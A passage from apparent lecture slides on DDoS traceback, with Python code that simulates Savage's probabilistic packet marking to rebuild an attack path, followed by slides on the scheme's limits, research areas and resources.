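    hops = []
    for d in range(max(by_dist) + 1):
        if d not in by_dist:
            break
        edge = by_dist[d].most_common(1)[0][0]
        hops.append(edge if d == 0 else edge ^ hops[d - 1])
    return hops


def expected_packets(d, p):
    """Savage's bound on the expected packets needed for a path of length d: ln(d) / (p (1-p)^(d-1))."""
    return math.log(d) / (p * (1 - p) ** (d - 1))


# Constructed path, attacker side first: 10.0.6.1 ... 10.0.1.1 (10.0.1.1 is adjacent to the victim).
PATH = [0x0A000601, 0x0A000501, 0x0A000401, 0x0A000301, 0x0A000201, 0x0A000101]

if __name__ == "__main__":
    hops = reconstruct(collect(PATH, p=0.04, n=4000, seed=7))
    print("expected packets for d=6, p=0.04: %.0f" % expected_packets(6, 0.04))
    print("recovered, victim side first:", [hex(h) for h in hops])
```

With p=0.04 a 6-hop path needs on the order of 55 packets by the paper’s bound, and the victim recovers 10.0.1.1 through 10.0.6.1 in order; the seventh "hop" decodes to 0, the value the attacker left in the field, which is the multiple-attacker/forgery caveat the next slide lists. The reconstruction here assumes one attack path; with several attackers at the same distance the candidate edges multiply, which is the combinatorial problem addressed by Dean, Franklin and Stubblefield.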
Issues with Savage
• Spreads edge identification across multiple packets (+)
• Combinatorial complexity during edge identification (-) (fixed by the Dean, Franklin, Stubblefield algorithm)
• Reuses the IP fragment (identification) field (-)
• Does not work on existing hardware (IRL) (-)
Research Areas
• How vulnerable are P2P protocols?
• How can we better identify the person vs. the program?
• Automatic migration during an attack
Resources
• Packetstormsecurity.com - DDoS tools
• Theorygroup.com - RID
• www.washington.edu/People/dad - David Dittrich’s analyses
• www.cert.org/reports/dsit_workshop.pdf - CERT on dealing with DDoS
Questions?
The End
Attacks Happen
General Direction
• Encrypted traffic
• Real software lifecycles
• Target name servers and other essential network equipment